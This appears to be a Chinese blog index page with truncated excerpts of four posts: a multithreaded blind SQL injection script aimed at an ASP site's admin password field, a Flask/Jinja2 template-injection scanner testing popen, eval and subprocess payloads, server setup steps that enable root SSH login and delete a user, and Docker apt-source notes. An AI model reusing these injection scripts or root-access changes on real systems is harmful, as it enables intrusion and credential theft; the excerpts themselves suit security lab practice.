多线程真jb多Bug，改了半天才改完，再也不搞多线程了，mmp importrequests importtime fromthreadingimportThread,Lock defACESS_INJECTION_SQL(): 站点 site="http://10.0.0.35:81/Production/PRODUCT_DETAIL.asp?id=1513" 表名 table="admin" 字段名 field="password" mutex=Lock() field_length=0 result_dict={} result_list=[] 判断字段长度 foriinran...

抛开代码丑不谈，用起来还是挺好用滴。 fromflaskimportFlask,request fromjinja2importTemplate fromthreadingimportThread importrequests importos 写入需注入的站点和url参数 site="http://127.0.0.1:5000/waewe?404_url=" url存储字典 url_dict={ "popen":[], "eval":[], "__import__":[], "subprocess":[], } 通用[Python2、3]及绕过payload currency_u...

1、登陆超级用户，并修改密码 sudosuroot echo'root:asd123.'|sudochpasswd 2、配置ssh服务 sed-i's/PermitRootLogin./PermitRootLoginyes/'/etc/ssh/sshd_config systemctlrestartsshd userdel`grep":1000:"/etc/passwd|cut-d:-f1` 3、修改网卡 cat>/etc/network/interfaces.d/eth0<<EOF autoeth0 ifaceeth0inetstatic address10.0.0....

dockerexec-it容器ID/bin/bash 进入容器内部，容器内部基本上很多命令都被删除，例如ping、curl、vim、vi、ip。如果有在容器内部调试的需求，没有这些基础命令是非常难受的。 在制作镜像时，都会使用一个基本的系统镜像来构建，基础镜像一般分为redhat系列和debian系列。 1：Debian系列 绝大部分debian系列默认并不支持httpsapt源，需要安装apt-transport-https和ca-certificates才支持。 清华源并不支持http，只有阿里云中科大的apt源才支持。 配置apt源 sed-i'/^deb\|^deb-src/s/^/...